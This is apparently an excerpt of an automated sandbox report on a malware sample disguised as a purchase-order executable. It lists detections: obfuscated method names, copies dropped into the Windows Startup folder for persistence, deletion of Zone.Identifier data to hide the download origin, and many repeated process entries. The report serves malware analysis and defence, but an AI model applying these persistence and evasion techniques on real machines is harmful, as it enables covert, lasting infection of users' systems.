                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.2cdebc0.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.40d3c4e.1.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.407aa5e.4.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.402185e.5.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 14.2.sage.exe.418600e.2.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 17.2.sage.exe.2d3d91c.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile created: C:\Users\user\AppData\Local\Temp\sages.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJump to dropped file

                Boot Survival

                barindex
                Drops PE files to the startup folder
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJump to dropped file
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnkJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnkJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe\:Zone.Identifier:$DATAJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\Desktop\PO# 81136575.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe\:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
